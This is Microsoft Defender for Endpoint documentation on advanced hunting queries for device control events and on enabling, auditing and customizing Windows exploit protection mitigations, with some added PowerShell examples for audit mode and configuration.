Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

When a device control policy is triggered, an event is visible with advanced hunting,
regardless of whether it was initiated by the system or by the user who signed in.
This section includes some example queries you can use in advanced hunting.

Example 1: Removable storage policy triggered by disk and file system level enforcement

When a RemovableStoragePolicyTriggered action occurs, event information about
the disk and file system level enforcement is available.

Tip

Currently, in advanced hunting, there's a limit of 300 events per device per day
for RemovableStoragePolicyTriggered events. Use the device control report to
view additional data.

Kusto

//RemovableStoragePolicyTriggered: event triggered by Disk and file system level enforcement for both Printer and Removable storage based on your policy
DeviceEvents
| where ActionType == "RemovableStoragePolicyTriggered"
| extend parsed=parse_json(AdditionalFields)
| extend RemovableStorageAccess = tostring(parsed.RemovableStorageAccess)
| extend RemovableStoragePolicyVerdict = tostring(parsed.RemovableStoragePolicyVerdict)
| extend MediaBusType = tostring(parsed.BusType)
| extend MediaClassGuid = tostring(parsed.ClassGuid)
| extend MediaClassName = tostring(parsed.ClassName)
| extend MediaDeviceId = tostring(parsed.DeviceId)
| extend MediaInstanceId = tostring(parsed.DeviceInstanceId)
| extend MediaName = tostring(parsed.MediaName)
| extend RemovableStoragePolicy = tostring(parsed.RemovableStoragePolicy)
| extend MediaProductId = tostring(parsed.ProductId)
| extend MediaVendorId = tostring(parsed.VendorId)
| extend MediaSerialNumber = tostring(parsed.SerialNumber)
| project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName,
    ActionType, RemovableStorageAccess, RemovableStoragePolicyVerdict,
    MediaBusType, MediaClassGuid, MediaClassName, MediaDeviceId,
    MediaInstanceId, MediaName, RemovableStoragePolicy, MediaProductId,
    MediaVendorId, MediaSerialNumber, FolderPath, FileSize
| order by Timestamp desc

Example 2: Removable storage file event

When a RemovableStorageFileEvent action occurs, information about the evidence
file is available for both printer protection and removable storage. Here's an
example query you can use with advanced hunting:

Kusto

//information of the evidence file
DeviceEvents
| where ActionType contains "RemovableStorageFileEvent"
| extend parsed=parse_json(AdditionalFields)
| extend Policy = tostring(parsed.Policy)
| extend PolicyRuleId = tostring(parsed.PolicyRuleId)
| extend MediaClassName = tostring(parsed.ClassName)
| extend MediaInstanceId = tostring(parsed.InstanceId)
| extend MediaName = tostring(parsed.MediaName)
| extend MediaProductId = tostring(parsed.ProductId)
| extend MediaVendorId = tostring(parsed.VendorId)
| extend MediaSerialNumber = tostring(parsed.SerialNumber)
| extend FileInformationOperation = tostring(parsed.DuplicatedOperation)
| extend FileEvidenceLocation = tostring(parsed.TargetFileLocation)
| project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName,
    ActionType, Policy, PolicyRuleId, FileInformationOperation,
    MediaClassName, MediaInstanceId, MediaName, MediaProductId,
    MediaVendorId, MediaSerialNumber, FileName, FolderPath, FileSize,
    FileEvidenceLocation, AdditionalFields
| order by Timestamp desc

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

See also
Device control in Microsoft Defender for Endpoint
Device Control for macOS



Protect devices from exploits
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Exploit protection automatically applies many exploit mitigation techniques to operating
system processes and apps. Exploit protection is supported beginning with Windows 10,
version 1709, Windows 11, and Windows Server, version 1803.

Exploit protection works best with Defender for Endpoint - which gives you detailed
reporting into exploit protection events and blocks as part of the usual alert
investigation scenarios.

You can enable exploit protection on an individual device, and then use Group Policy to
distribute the XML file to multiple devices at once.

When a mitigation is found on the device, a notification is displayed from the Action
Center. You can customize the notification with your company details and contact
information. You can also enable the rules individually to customize what techniques the
feature monitors.

You can also use audit mode to evaluate how exploit protection would affect your
organization if it were enabled.

Many of the features in the Enhanced Mitigation Experience Toolkit (EMET) are
included in exploit protection. In fact, you can convert and import your existing EMET
configuration profiles into exploit protection. To learn more, see Import, export, and
deploy exploit protection configurations.

Important

If you're currently using EMET, be aware that EMET reached end of support on
July 31, 2018. Consider replacing EMET with exploit protection in Windows 10.

Warning

Some security mitigation technologies may have compatibility issues with some
applications. You should test exploit protection in all target use scenarios by using
audit mode before deploying the configuration across a production environment
or the rest of your network.

Review exploit protection events in the Microsoft Defender portal

Defender for Endpoint provides detailed reporting into events and blocks as part of its
alert investigation scenarios.

You can query Defender for Endpoint data by using Advanced hunting. If you're using
audit mode, you can use advanced hunting to see how exploit protection settings could
affect your environment.

Here's an example query:

Kusto

DeviceEvents
| where ActionType startswith 'ExploitGuard' and ActionType !contains 'NetworkProtection'

Review exploit protection events in Windows Event Viewer

You can review the Windows event log to see events that are created when exploit
protection blocks (or audits) an app:

Provider/source | Event ID | Description
Security-Mitigations | 1 | ACG audit
Security-Mitigations | 2 | ACG enforce
Security-Mitigations | 3 | Don't allow child processes audit
Security-Mitigations | 4 | Don't allow child processes block
Security-Mitigations | 5 | Block low integrity images audit
Security-Mitigations | 6 | Block low integrity images block
Security-Mitigations | 7 | Block remote images audit
Security-Mitigations | 8 | Block remote images block
Security-Mitigations | 9 | Disable win32k system calls audit
Security-Mitigations | 10 | Disable win32k system calls block
Security-Mitigations | 11 | Code integrity guard audit
Security-Mitigations | 12 | Code integrity guard block
Security-Mitigations | 13 | EAF audit
Security-Mitigations | 14 | EAF enforce
Security-Mitigations | 15 | EAF+ audit
Security-Mitigations | 16 | EAF+ enforce
Security-Mitigations | 17 | IAF audit
Security-Mitigations | 18 | IAF enforce
Security-Mitigations | 19 | ROP StackPivot audit
Security-Mitigations | 20 | ROP StackPivot enforce
Security-Mitigations | 21 | ROP CallerCheck audit
Security-Mitigations | 22 | ROP CallerCheck enforce
Security-Mitigations | 23 | ROP SimExec audit
Security-Mitigations | 24 | ROP SimExec enforce
WER-Diagnostics | 5 | CFG Block
Win32K | 260 | Untrusted Font

Mitigation comparison
The mitigations available in EMET are included natively in Windows 10 (starting with
version 1709), Windows 11, and Windows Server (starting with version 1803), under
Exploit protection.
The table in this section indicates the availability and support of native mitigations
between EMET and exploit protection.

Mitigation | Available under exploit protection | Available in EMET
Arbitrary code guard (ACG) | Yes | Yes, as "Memory Protection Check"
Block remote images | Yes | Yes, as "Load Library Check"
Block untrusted fonts | Yes | Yes
Data Execution Prevention (DEP) | Yes | Yes
Export address filtering (EAF) | Yes | Yes
Force randomization for images (Mandatory ASLR) | Yes | Yes
NullPage Security Mitigation | Yes; included natively in Windows 10 and Windows 11 (for more information, see Mitigate threats by using Windows 10 security features) | Yes
Randomize memory allocations (Bottom-Up ASLR) | Yes | Yes
Simulate execution (SimExec) | Yes | Yes
Validate API invocation (CallerCheck) | Yes | Yes
Validate exception chains (SEHOP) | Yes | Yes
Validate stack integrity (StackPivot) | Yes | Yes
Certificate trust (configurable certificate pinning) | Windows 10 and Windows 11 provide enterprise certificate pinning | Yes
Heap spray allocation | Ineffective against newer browser-based exploits; newer mitigations provide better protection (for more information, see Mitigate threats by using Windows 10 security features) | Yes
Block low integrity images | Yes | No
Code integrity guard | Yes | No
Disable extension points | Yes | No
Disable Win32k system calls | Yes | No
Don't allow child processes | Yes | No
Import address filtering (IAF) | Yes | No
Validate handle usage | Yes | No
Validate heap integrity | Yes | No
Validate image dependency integrity | Yes | No

Note

The Advanced ROP mitigations that are available in EMET are superseded by ACG in
Windows 10 and Windows 11. Other EMET advanced settings are enabled by default
as part of enabling the anti-ROP mitigations for a process. For more information on
how Windows 10 employs existing EMET technology, see Mitigate threats by using
Windows 10 security features.

See also
Configure and audit exploit protection mitigations
Troubleshoot exploit protection
Optimize ASR rule deployment and detections

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Evaluate exploit protection
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Exploit protection helps protect devices from malware that uses exploits to spread and
infect other devices. Mitigation can be applied to either the operating system or to an
individual app. Many of the features that were part of the Enhanced Mitigation
Experience Toolkit (EMET) are included in exploit protection. (The EMET has reached its
end of support.)

In audit mode, you can see how mitigation works for certain apps in a test environment.
This shows what would have happened if you enabled exploit protection in your production
environment. This way, you can verify that exploit protection doesn't adversely affect
your line-of-business apps, and see which suspicious or malicious events occur.

Enable exploit protection for testing

You can set mitigations in a testing mode for specific programs by using the Windows
Security app or Windows PowerShell.

Windows Security app

1. Open the Windows Security app. Select the shield icon in the task bar or search the
start menu for Windows Security.

2. Select the App & browser control tile (or the app icon on the left menu bar) and
then select Exploit protection.

3. Go to Program settings and choose the app you want to apply protection to:

a. If the app you want to configure is already listed, select it and then select Edit.

b. If the app isn't listed at the top of the list, select Add program to customize.
Then, choose how you want to add the app.
Use Add by program name to have the mitigation applied to any running
process with that name. Specify a file with an extension. You can enter a
full path to limit the mitigation to only the app with that name in that
location.
Use Choose exact file path to use a standard Windows Explorer file picker
window to find and select the file you want.

4. After selecting the app, you'll see a list of all the mitigations that can be applied.
Choosing Audit will apply the mitigation in test mode only. You'll be notified if you
need to restart the process, app, or Windows.

5. Repeat this procedure for all the apps and mitigations you want to configure.
Select Apply when you're done setting up your configuration.

PowerShell

To set app-level mitigations to test mode, use Set-ProcessMitigation with the Audit
mode cmdlet for the mitigation (listed in the table below).

Configure each mitigation in the following format:

PowerShell

Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>

Where:

<Scope>:
-Name to indicate the mitigations should be applied to a specific app. Specify
the app's executable after this flag.

<Action>:
-Enable to enable the mitigation
-Disable to disable the mitigation

<Mitigation>:
The mitigation's cmdlet as defined in the following table. Each mitigation is
separated with a comma.

Mitigation | Test mode cmdlet
Arbitrary Code Guard (ACG) | AuditDynamicCode
Block low integrity images | AuditImageLoad
Block untrusted fonts | AuditFont, FontAuditOnly
Code integrity guard | AuditMicrosoftSigned, AuditStoreSigned
Disable Win32k system calls | AuditSystemCall
Don't allow child processes | AuditChildProcess

For example, to enable Arbitrary Code Guard (ACG) in test mode for an app named
testing.exe, run the following command:

PowerShell

Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable AuditDynamicCode

You can disable audit mode by replacing -Enable with -Disable .
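
To put several line-of-business apps into audit mode for every mitigation in the table at
once, and to capture the result as the XML file that Group Policy distributes, the
following PowerShell is an added example, not part of the Microsoft documentation; the
app paths and the output path are placeholders, and Get-ProcessMitigation is called with
the same -Name value that was passed to Set-ProcessMitigation.

```powershell
# Added example, not from the Microsoft documentation: apply the audit-mode options from
# the table above to a set of apps, then export the resulting configuration to XML for
# Group Policy distribution. App and output paths are placeholders; run as administrator.

# Mitigation name -> audit-mode option(s) for Set-ProcessMitigation, taken from the table.
$AuditOptions = @{
    ACG                = @('AuditDynamicCode')
    LowIntegrityImages = @('AuditImageLoad')
    UntrustedFonts     = @('AuditFont', 'FontAuditOnly')
    CodeIntegrityGuard = @('AuditMicrosoftSigned', 'AuditStoreSigned')
    Win32kSystemCalls  = @('AuditSystemCall')
    ChildProcesses     = @('AuditChildProcess')
}

function Set-AuditMitigation {
    param(
        [Parameter(Mandatory)] [string[]] $AppPath,
        # Keys of $AuditOptions; defaults to every mitigation in the table.
        [string[]] $Mitigation = @($AuditOptions.Keys),
        # Use -Disable to roll the same options back once testing is done.
        [switch] $Disable
    )
    # Flatten the selected mitigations into one list of audit options.
    $options = foreach ($m in $Mitigation) { $AuditOptions[$m] }
    foreach ($app in $AppPath) {
        if ($Disable) { Set-ProcessMitigation -Name $app -Disable $options }
        else          { Set-ProcessMitigation -Name $app -Enable  $options }
        # Show what is now configured for the app so the change can be confirmed.
        Get-ProcessMitigation -Name $app
    }
}

# Put the test apps into audit mode for every mitigation in the table (placeholder paths).
$apps = 'C:\apps\lob\tests\testing.exe', 'C:\apps\lob\reports\report.exe'
Set-AuditMitigation -AppPath $apps

# Export the device's exploit protection settings, including the audit entries just made,
# to an XML file; this is the file to distribute with Group Policy (placeholder path).
Get-ProcessMitigation -RegistryConfigFilePath 'C:\ExploitProtection\audit-settings.xml'

# After the review, roll back with: Set-AuditMitigation -AppPath $apps -Disable
```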

Review exploit protection audit events

To review which apps would have been blocked, open Event Viewer and filter for the
following events in the Security-Mitigations log.

ノ Expand table

Feature Provider/source Event Description


ID

Exploit Security-Mitigations (Kernel 1 ACG audit


protection Mode/User Mode)

Exploit Security-Mitigations (Kernel 3 Do not allow child


protection Mode/User Mode) processes audit

Exploit Security-Mitigations (Kernel 5 Block low integrity images


protection Mode/User Mode) audit

Exploit Security-Mitigations (Kernel 7 Block remote images audit


protection Mode/User Mode)

Exploit Security-Mitigations (Kernel 9 Disable win32k system calls


protection Mode/User Mode) audit
Feature Provider/source Event Description
ID

Exploit Security-Mitigations (Kernel 11 Code integrity guard audit


protection Mode/User Mode)
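
The two steps above, putting app-level mitigations into audit mode and then reading the
audit events back, as one added PowerShell example. This is not code from the original
article: it enables the ACG and child-process audit keywords for a placeholder executable
name, then queries the KernelMode and UserMode channels behind the Security-Mitigations
node in Event Viewer for the event IDs in the table and summarizes them by mitigation.
The executable name, the eight-hour review window, and the DynamicCode and ChildProcess
property names on the Get-ProcessMitigation output are assumptions. Run it from an
elevated session.

```powershell
# Added example (not from the original article): put two app-level mitigations into
# audit mode, then pull the resulting audit events from the Security-Mitigations
# channels and summarize them by event ID. Run from an elevated PowerShell session.

#Requires -RunAsAdministrator

$Target = 'testing.exe'   # assumed name; a full path would limit it to one location

# Event IDs and descriptions from the audit-event table above. These are the
# "would have been blocked" events raised by mitigations configured with Audit* keywords.
$AuditEvents = @{
    1  = 'ACG audit'
    3  = 'Do not allow child processes audit'
    5  = 'Block low integrity images audit'
    7  = 'Block remote images audit'
    9  = 'Disable win32k system calls audit'
    11 = 'Code integrity guard audit'
}

# Channels behind the "Security-Mitigations" node in Event Viewer
# (Applications and Services Logs > Microsoft > Windows > Security-Mitigations).
$Channels = @(
    'Microsoft-Windows-Security-Mitigations/KernelMode',
    'Microsoft-Windows-Security-Mitigations/UserMode'
)

function Enable-AuditMitigations {
    param([string]$Exe)
    # Audit keywords from the test-mode table: ACG and child-process creation.
    # Nothing is blocked; Windows only logs what *would* have been blocked.
    Set-ProcessMitigation -Name $Exe -Enable AuditDynamicCode, AuditChildProcess
    # Property names DynamicCode / ChildProcess are assumed; use Format-List to inspect.
    Get-ProcessMitigation -Name $Exe | Select-Object ProcessName, DynamicCode, ChildProcess
}

function Get-ExploitProtectionAudit {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    $filter = @{ LogName = $Channels; Id = @($AuditEvents.Keys); StartTime = $Since }
    # Get-WinEvent throws when nothing matches; treat "no events" as an empty result.
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        [pscustomobject]@{
            Time       = $e.TimeCreated
            Channel    = $e.LogName.Split('/')[-1]        # KernelMode or UserMode
            Id         = $e.Id
            Mitigation = $AuditEvents[$e.Id]
            Message    = ($e.Message -split "`r?`n")[0]   # first line only
        }
    }
}

Enable-AuditMitigations -Exe $Target
# ... exercise the application normally, then come back and review:
$audit = Get-ExploitProtectionAudit -Since (Get-Date).AddHours(-8)
$audit | Sort-Object Time | Format-Table -AutoSize

# Which mitigations would have fired, and how often? Zero rows for a mitigation after a
# representative test run is the signal that it can be moved from audit to enforce.
$audit | Group-Object Mitigation | Select-Object Name, Count | Sort-Object Count -Descending
```

The summary at the end is the check that matters: a mitigation that never logged an
audit event during a full run of the app's workflows can be switched to its enforcing
keyword, while one that fired needs the application owner's input before it is enforced.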

See also
Enable exploit protection
Configure and audit exploit protection mitigations
Import, export, and deploy exploit protection configurations
Troubleshoot exploit protection

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Enable exploit protection
Article • 05/03/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Endpoint Plan 1
Microsoft Defender XDR

 Tip

Want to experience Defender for Endpoint? Sign up for a free trial.

Exploit protection helps protect against malware that uses exploits to infect devices and
spread. Exploit protection consists of many mitigations that can be applied to either the
operating system or individual apps.

) Important

.NET 2.0 isn't compatible with some exploit protection capabilities, specifically
Export Address Filtering (EAF) and Import Address Filtering (IAF). If you have
enabled .NET 2.0, using EAF and IAF isn't supported.

Many features from the Enhanced Mitigation Experience Toolkit (EMET) are included in
exploit protection.

You can enable each mitigation separately by using any of these methods:

Windows Security app
Microsoft Intune
Mobile Device Management (MDM)
Microsoft Configuration Manager
Group Policy
PowerShell

Exploit protection is configured by default in Windows 10 and Windows 11. You can set
each mitigation to on, off, or to its default value. Some mitigations have more options.
You can export these settings as an XML file and deploy them to other devices.

You can also set mitigations to audit mode. Audit mode allows you to test how the
mitigations would work (and review events) without impacting the normal use of the
device.

Windows Security app


1. Open the Windows Security app by either selecting the shield icon in your task bar,
or by searching the Start menu for Security.

2. Select the App & browser control tile (or the app icon on the left menu bar) and
then select Exploit protection settings.

3. Go to Program settings and choose the app you want to apply mitigations to.

If the app you want to configure is already listed, select it, and then select
Edit.
If the app isn't listed, at the top of the list select Add program to customize
and then choose how you want to add the app.
Use Add by program name to have the mitigation applied to any running
process with that name. Specify a file with its extension. You can enter a full
path to limit the mitigation to only the app with that name in that location.
Use Choose exact file path to use a standard Windows Explorer file picker
window to find and select the file you want.

4. After selecting the app, you'll see a list of all the mitigations that can be applied.
Choosing Audit will apply the mitigation in audit mode only. You're notified if you
need to restart the process or app, or if you need to restart Windows.

5. Repeat steps 3-4 for all the apps and mitigations you want to configure.

6. Under the System settings section, find the mitigation you want to configure and
then specify one of the following settings. Apps that aren't configured individually
in the Program settings section use the settings that are configured here.

On by default: The mitigation is enabled for apps that don't have this
mitigation set in the app-specific Program settings section
Off by default: The mitigation is disabled for apps that don't have this
mitigation set in the app-specific Program settings section
Use default: The mitigation is either enabled or disabled, depending on the
default configuration that is set up by Windows 10 or Windows 11
installation; the default value (On or Off) is always specified next to the Use
default label for each mitigation

7. Repeat step 6 for all the system-level mitigations you want to configure. Select
Apply when you're done setting up your configuration.

If you add an app to the Program settings section and configure individual mitigation
settings there, they'll be honored above the configuration for the same mitigations
specified in the System settings section. The following matrix and examples help to
illustrate how defaults work:

Enabled in Program settings | Enabled in System settings | Behavior
--- | --- | ---
Yes | No | As defined in Program settings
Yes | Yes | As defined in Program settings
No | Yes | As defined in System settings
No | No | Default as defined in Use default option

Example 1: Mikael configures Data Execution Prevention in the System settings section to be off by default

Mikael adds the app test.exe to the Program settings section. In the options for that
app, under Data Execution Prevention (DEP), Mikael enables the Override system
settings option and sets the switch to On. There are no other apps listed in the Program
settings section.

The result is that DEP is enabled only for test.exe. All other apps won't have DEP applied.

Example 2: Josie configures Data Execution Prevention in the System settings section to be off by default

Josie adds the app test.exe to the Program settings section. In the options for that app,
under Data Execution Prevention (DEP), Josie enables the Override system settings
option and sets the switch to On.

Josie also adds the app miles.exe to the Program settings section and configures
Control flow guard (CFG) to On. Josie doesn't enable the Override system settings
option for DEP or any other mitigations for that app.

The result is that DEP is enabled for test.exe. DEP won't be enabled for any other app,
including miles.exe. CFG will be enabled for miles.exe.

Intune
1. Sign in to the Azure portal and open Intune.

2. Go to Device configuration > Configuration Profiles > Create profile.

3. Name the profile, choose Windows 10 and later, select templates for Profile type
and choose Endpoint protection under template name.

4. Select Configure > Windows Defender Exploit Guard > Exploit protection.

5. Upload an XML file with the exploit protection settings.

6. Select OK to save each open blade, and then choose Create.

7. Select the profile Assignments tab, assign the policy to All Users & All Devices,
and then select Save.

MDM
Use the ./Vendor/MSFT/Policy/Config/ExploitGuard/ExploitProtectionSettings
configuration service provider (CSP) to enable or disable exploit protection mitigations
or to use audit mode.

Microsoft Configuration Manager

Endpoint Security
1. In Microsoft Configuration Manager, go to Endpoint Security > Attack surface
reduction.

2. Select Create Policy > Platform, and for Profile, choose Exploit Protection. Then
select Create.

3. Specify a name and a description, and then choose Next.

4. Choose Select XML File and browse to the location of the exploit protection XML
file. Select the file, and then choose Next.

5. Configure Scope tags and Assignments if necessary.

6. Under Review + create, review your configuration settings, and then choose
Create.

Assets and Compliance


1. In Microsoft Configuration Manager, go to Assets and Compliance > Endpoint
Protection > Windows Defender Exploit Guard.

2. Select Home > Create Exploit Guard Policy.

3. Specify a name and a description, select Exploit protection, and then choose Next.

4. Browse to the location of the exploit protection XML file and select Next.

5. Review the settings, and then choose Next to create the policy.

6. After the policy is created, select Close.


Group Policy
1. On your Group Policy management device, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and click Edit.

2. In the Group Policy Management Editor, go to Computer configuration and
select Administrative templates.

3. Expand the tree to Windows components > Windows Defender Exploit Guard >
Exploit Protection > Use a common set of exploit protection settings.

4. Select Enabled and type the location of the XML file, and then choose OK.

PowerShell
You can use the PowerShell verb Get or Set with the cmdlet ProcessMitigation. Using
Get lists the current configuration status of any mitigations that have been enabled
on the device. Add the -Name parameter and the app's executable to see mitigations for
just that app:

PowerShell

Get-ProcessMitigation -Name processName.exe

) Important

System-level mitigations that haven't been configured show a status of NOTSET.

For system-level settings, NOTSET indicates the default setting for that
mitigation has been applied.
For app-level settings, NOTSET indicates the system-level setting for the
mitigation will be applied. The default setting for each system-level mitigation
can be seen in the Windows Security app.

Use Set to configure each mitigation in the following format:

PowerShell

Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>

Where:

<Scope>:
-Name to indicate the mitigations should be applied to a specific app. Specify the app's executable after this flag.
-System to indicate the mitigation should be applied at the system level

<Action>:
-Enable to enable the mitigation
-Disable to disable the mitigation

<Mitigation>:
The mitigation's keyword as listed in the table later in this article, along with any
suboptions. Each mitigation is separated with a comma.

For example, to enable the Data Execution Prevention (DEP) mitigation with ATL thunk
emulation for an executable called testing.exe in the folder C:\Apps\LOB\tests, and to
prevent that executable from creating child processes, you'd use the following
command:

PowerShell

Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation

) Important

Separate each mitigation option with commas.

If you wanted to apply DEP at the system level, you'd use the following command:

PowerShell

Set-ProcessMitigation -System -Enable DEP

To disable mitigations, you can replace -Enable with -Disable. However, for app-level
mitigations, this action forces the mitigation to be disabled only for that app, which
overrides the system-level setting for that app.

If you need to restore the mitigation back to the system default, you need to include the
-Remove parameter as well, as in the following example:

PowerShell

Set-ProcessMitigation -Name test.exe -Remove -Disable DEP
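
An added example, not code from the article, that walks the -Enable, -Disable and
-Remove steps above on one placeholder app and reads the state back after each step,
so the difference between OFF (an explicit per-app opt-out that overrides the system
setting) and NOTSET (inherit the system setting) is visible. The executable name and the
Dep.Enable, Dep.EmulateAtlThunks and ChildProcess.DisallowChildProcessCreation property
paths on the Get-ProcessMitigation output are assumptions; if a build names them
differently, pipe the object to Format-List. Run it elevated on a device that has no
Group Policy exploit protection setting, since policy overrides local changes.

```powershell
# Added example (not from the original article): lifecycle of one app-level mitigation
# with Get-ProcessMitigation / Set-ProcessMitigation, checking state after each step.

#Requires -RunAsAdministrator

$Exe = 'testing.exe'   # assumed name; no path, so any process with this name matches

function Get-MitigationState {
    # Returns the three values we care about as a small object so they can be compared
    # before and after each change. NOTSET on an app means "inherit the system-level
    # setting"; NOTSET at system level means "Windows default".
    # Property paths below are assumed from current Get-ProcessMitigation output.
    param([string]$Name)
    $m = Get-ProcessMitigation -Name $Name
    [pscustomobject]@{
        Process    = $m.ProcessName
        Dep        = $m.Dep.Enable
        AtlThunks  = $m.Dep.EmulateAtlThunks
        NoChildren = $m.ChildProcess.DisallowChildProcessCreation
    }
}

function Get-SystemDep {
    # System-level view of the same mitigation, for comparison with the app-level view.
    (Get-ProcessMitigation -System).Dep.Enable
}

Write-Host "System-level DEP : $(Get-SystemDep)"
Write-Host "Before (app-level, expect NOTSET = inherits the system setting):"
Get-MitigationState -Name $Exe | Format-List

# 1. Enforce DEP with ATL thunk emulation and block child processes for this app only.
#    Program settings take precedence over System settings for the same mitigation.
Set-ProcessMitigation -Name $Exe -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation
Write-Host "After -Enable (expect ON):"
Get-MitigationState -Name $Exe | Format-List

# 2. -Disable does NOT return to the default: it pins the mitigation OFF for this app,
#    which overrides a system-level ON. Usually not what you want for DEP.
Set-ProcessMitigation -Name $Exe -Disable DEP
Write-Host "After -Disable (expect OFF, an explicit per-app opt-out):"
Get-MitigationState -Name $Exe | Format-List

# 3. -Remove clears the per-app entry so the system-level setting applies again.
Set-ProcessMitigation -Name $Exe -Remove -Disable DEP
Write-Host "After -Remove (expect NOTSET, back to the system-level value):"
Get-MitigationState -Name $Exe | Format-List

# Guard: if the app still carries an explicit value, the local change did not take.
$state = Get-MitigationState -Name $Exe
if ($state.Dep -ne 'NOTSET') {
    Write-Warning "DEP is still pinned to $($state.Dep) for $Exe; check for a Group Policy exploit protection setting, which overrides local configuration."
}
```

The point of step 2 is the one that bites in practice: -Disable on an app is not "undo",
it is a per-app override that survives a later system-level -Enable. Use -Remove when
the intent is to stop managing the mitigation for that app.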


The following table lists the individual mitigations (and audits, when available) to be
used with the -Enable or -Disable parameters.

Mitigation type | Applies to | Mitigation keyword | Audit mode keyword
--- | --- | --- | ---
Control flow guard (CFG) | System and app-level | CFG, StrictCFG, SuppressExports | Audit not available
Data Execution Prevention (DEP) | System and app-level | DEP, EmulateAtlThunks | Audit not available
Force randomization for images (Mandatory ASLR) | System and app-level | ForceRelocateImages | Audit not available
Randomize memory allocations (Bottom-Up ASLR) | System and app-level | BottomUp, HighEntropy | Audit not available
Validate exception chains (SEHOP) | System and app-level | SEHOP, SEHOPTelemetry | Audit not available
Validate heap integrity | System and app-level | TerminateOnError | Audit not available
Arbitrary code guard (ACG) | App-level only | DynamicCode | AuditDynamicCode
Block low integrity images | App-level only | BlockLowLabel | AuditImageLoad
Block remote images | App-level only | BlockRemoteImages | Audit not available
Block untrusted fonts | App-level only | DisableNonSystemFonts | AuditFont, FontAuditOnly
Code integrity guard | App-level only | BlockNonMicrosoftSigned, AllowStoreSigned | AuditMicrosoftSigned, AuditStoreSigned
Disable extension points | App-level only | ExtensionPoint | Audit not available
Disable Win32k system calls | App-level only | DisableWin32kSystemCalls | AuditSystemCall
Don't allow child processes | App-level only | DisallowChildProcessCreation | AuditChildProcess
Export address filtering (EAF) | App-level only | EnableExportAddressFilterPlus, EnableExportAddressFilter [1] | Audit not available [2]
Import address filtering (IAF) | App-level only | EnableImportAddressFilter | Audit not available [2]
Simulate execution (SimExec) | App-level only | EnableRopSimExec | Audit not available [2]
Validate API invocation (CallerCheck) | App-level only | EnableRopCallerCheck | Audit not available [2]
Validate handle usage | App-level only | StrictHandle | Audit not available
Validate image dependency integrity | App-level only | EnforceModuleDepencySigning | Audit not available
Validate stack integrity (StackPivot) | App-level only | EnableRopStackPivot | Audit not available [2]

[1]: Use the following format to enable EAF modules for DLLs for a process:

PowerShell

Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules dllName1.dll,dllName2.dll

[2]: Audit for this mitigation isn't available via PowerShell cmdlets.

Customize the notification


For information about customizing the notification when a rule is triggered and an app
or file is blocked, see Windows Security.

See also
Evaluate exploit protection
Configure and audit exploit protection mitigations
Import, export, and deploy exploit protection configurations

Customize exploit protection
Article • 09/29/2022

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Exploit protection automatically applies a number of exploit mitigation techniques on
both the operating system processes and on individual apps.

Configure these settings using the Windows Security app on an individual device. Then,
export the configuration as an XML file so you can deploy to other devices. Use Group
Policy to distribute the XML file to multiple devices at once. You can also configure the
mitigations with PowerShell.

This article lists each of the mitigations available in exploit protection. It indicates
whether the mitigation can be applied system-wide or to individual apps, and provides a
brief description of how the mitigation works.

It also describes how to enable or configure the mitigations using Windows Security,
PowerShell, and mobile device management (MDM) configuration service providers
(CSPs). This is the first step in creating a configuration that you can deploy across your
network. The next step involves generating, exporting, importing, and deploying the
configuration to multiple devices.

2 Warning

Some security mitigation technologies may have compatibility issues with some
applications. You should test exploit protection in all target use scenarios by using
audit mode before deploying the configuration across a production environment
or the rest of your network.

Exploit protection mitigations

All mitigations can be configured for individual apps. Some mitigations can also be
applied at the operating system level.

You can set each of the mitigations on, off, or to their default value. Some mitigations
have additional options that are indicated in the description in the table.

Default values are always specified in brackets at the Use default option for each
mitigation. For example, the Use default option for Data Execution Prevention shows "On".

The Use default configuration for each of the mitigation settings indicates our
recommendation for a base level of protection for everyday usage for home users.
Enterprise deployments should consider the protection required for their individual
needs and may need to modify configuration away from the defaults.

For the associated PowerShell cmdlets for each mitigation, see the PowerShell reference
table at the bottom of this article.

Mitigation | Description | Can be applied to | Audit mode available
--- | --- | --- | ---
Control flow guard (CFG) | Ensures control flow integrity for indirect calls. Can optionally suppress exports and use strict CFG. | System and app-level | No
Data Execution Prevention (DEP) | Prevents code from being run from data-only memory pages such as the heap and stacks. Only configurable for 32-bit (x86) apps; permanently enabled for all other architectures. Can optionally enable ATL thunk emulation. | System and app-level | No
Force randomization for images (Mandatory ASLR) | Forcibly relocates images not compiled with /DYNAMICBASE. Can optionally fail loading images that don't have relocation information. | System and app-level | No
Randomize memory allocations (Bottom-Up ASLR) | Randomizes locations for virtual memory allocations. It includes system structure heaps, stacks, TEBs, and PEBs. Can optionally use a wider randomization variance for 64-bit processes. | System and app-level | No
Validate exception chains (SEHOP) | Ensures the integrity of an exception chain during exception dispatch. Only configurable for 32-bit (x86) applications. | System and app-level | No
Validate heap integrity | Terminates a process when heap corruption is detected. | System and app-level | No
